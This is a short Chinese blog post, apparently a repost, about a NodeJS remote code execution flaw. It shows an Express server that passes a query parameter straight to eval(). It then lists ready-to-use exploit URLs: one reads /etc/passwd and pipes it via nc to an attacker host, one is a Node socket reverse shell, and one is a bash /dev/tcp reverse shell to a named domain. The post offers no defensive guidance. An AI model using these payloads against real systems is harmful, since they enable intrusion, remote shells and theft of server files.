服务器 NodeJs

NodeJS远程代码执行

Posted in NodeJs onAugust 28, 2016

背景

@Artsploit在挖PayPal的漏洞时，发现一处NodeJS代码执行，奖励$10000美金。

测试

var express = require('express'); 
var app = express(); 
app.get('/', function (req, res) { 
  res.send('Hello eval(req.query.q));
  console.log(req.query.q);
});
app.listen(8080, function () { 
  console.log('Example listening on port 8080!');
});

任意文件读取

http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

GET SHELL

http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

GET SHELL2

http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')

NodeJS远程代码执行

- Author -

hebedich

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

NodeJs 相关文章推荐

Ubuntu中搭建Nodejs开发环境过程分享

Jun 01 NodeJs

nodejs URL模块操作URL相关方法介绍

Mar 03 NodeJs

你一定会收藏的Nodejs代码片段

Feb 04 NodeJs

Nodejs 搭建简单的Web服务器详解及实例

Nov 30 NodeJs

详解nodejs微信公众号开发——2.自动回复

Apr 10 NodeJs

详解nodejs中express搭建权限管理系统

Sep 15 NodeJs

nodejs实现截取上传视频中一帧作为预览图片

Dec 10 NodeJs

NodeJs 文件系统操作模块fs使用方法详解

Nov 26 NodeJs

详解NodeJS Https HSM双向认证实现

Mar 12 NodeJs

Nodejs中的require函数的具体使用方法

Apr 02 NodeJs

nodejs检测因特网是否断开的解决方案

Apr 17 NodeJs

分享node.js实现简单登录注册的具体代码

Apr 26 NodeJs

用NodeJS实现批量查询地理位置的经纬度接口

Aug 16 #NodeJs

使用nodejs中httpProxy代理时候出现404异常的解决方法

Aug 15 #NodeJs

NodeJs的优势和适合开发的程序

Aug 14 #NodeJs

在windows上用nodejs搭建静态文件服务器的简单方法

Aug 11 #NodeJs

Nodejs抓取html页面内容（推荐）

Aug 11 #NodeJs

用nodejs的实现原理和搭建服务器(动态)

Aug 10 #NodeJs

nodejs如何获取时间戳与时间差

Aug 03 #NodeJs